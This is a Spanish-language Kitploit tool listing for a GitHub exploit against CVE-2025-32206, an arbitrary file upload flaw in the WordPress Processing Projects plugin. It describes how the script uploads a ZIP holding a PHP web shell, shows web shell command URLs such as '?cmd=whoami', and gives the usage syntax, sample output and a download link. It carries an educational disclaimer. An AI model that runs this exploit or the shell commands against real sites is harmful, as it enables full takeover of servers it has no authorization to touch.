Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32206 — WordPress Processing Projects Plugin <= 1.0.2 es vulnerable a Arbitrary File Upload | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-32206
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de Penetración
GitHubnxploited/cve-2025-32206

CVE-2025-32206

WordPress Processing Projects Plugin <= 1.0.2 es vulnerable a Arbitrary File Upload

Ver Repositorio
21hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-32206 - Exploit de Subida Arbitraria de Archivos en WordPress Processing Projects <= 1.0.2

CVE-2025-32206 Banner


🔍 Información del CVE

  • CVE ID: CVE-2025-32206
  • Tipo de Vulnerabilidad: Subida de Archivos sin Restricciones (Subida de Web Shell)
  • Plugin Afectado: Processing Projects para WordPress
  • Versiones Afectadas: Desde desconocida (n/a) hasta 1.0.2
  • Puntuación CVSS: 9.1 (CRÍTICA)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

"La vulnerabilidad de subida sin restricciones de archivos con tipo peligroso en LABCAT Processing Projects permite a atacantes subir una web shell a un servidor web. Esto puede llevar a un compromiso total."


🧑‍💻 Descripción del Exploit

Este script de exploit en Python ataca sitios WordPress que utilizan el plugin vulnerable Processing Projects (versión <= 1.0.2). El plugin maneja incorrectamente las subidas de archivos de usuarios autenticados, permitiéndoles subir archivos ZIP arbitrarios que incluyen código PHP ejecutable (web shells).

El script del exploit:

  1. Se autentica en el sitio WordPress objetivo como administrador.
  2. Navega al endpoint vulnerable y extrae automáticamente los campos nonce.
  3. Crea un archivo ZIP (Nxploited.zip) que contiene una shell PHP maliciosa (Nxploit.php).
  4. Sube el archivo mediante una solicitud POST imitando el comportamiento del administrador de WordPress.
  5. Comprueba si la shell es accesible en:
    • http://target.com/wp-content/uploads/processing-projects/Nxploit.php

🐚 Uso de la Shell

Una vez que la shell se ha subido correctamente, se puede usar para ejecutar comandos del sistema mediante el parámetro cmd. Ejemplos:

root@kitploit:~
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls

Esta shell ejecuta comandos arbitrarios del sistema operativo y devuelve su salida directamente en la respuesta.


🚀 Uso

root@kitploit:~
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for CVE-2025-32206 | By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g. http://target.com/wordpress)
  -un, --username USERNAME     WordPress admin username
  -p, --password PASSWORD      WordPress admin password

📄 Salida de Ejemplo

root@kitploit:~

[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Arbitrary File Upload
[+] By Nxploited | Khaled Alenazi

[+] Created zip with shell: Nxploited.zip -> Nxploit.php
[+] Logged in successfully.
[+] Extracted form fields successfully.
[+] Upload request sent successfully.
[+] Shell executed at: http://target.com/wp-content/uploads/processing-projects/Nxploit.php

⚠️ Aviso Legal

Este script se proporciona solo con fines educativos. El uso no autorizado de este exploit en sistemas que no poseas o para los que no tengas permiso explícito de prueba es ilegal y poco ético.

Sigue siempre las prácticas de divulgación responsable y utiliza esta herramienta solo en entornos controlados o con autorización explícita.


Por : Nxploited | Khaled Alenazi

Descargar herramienta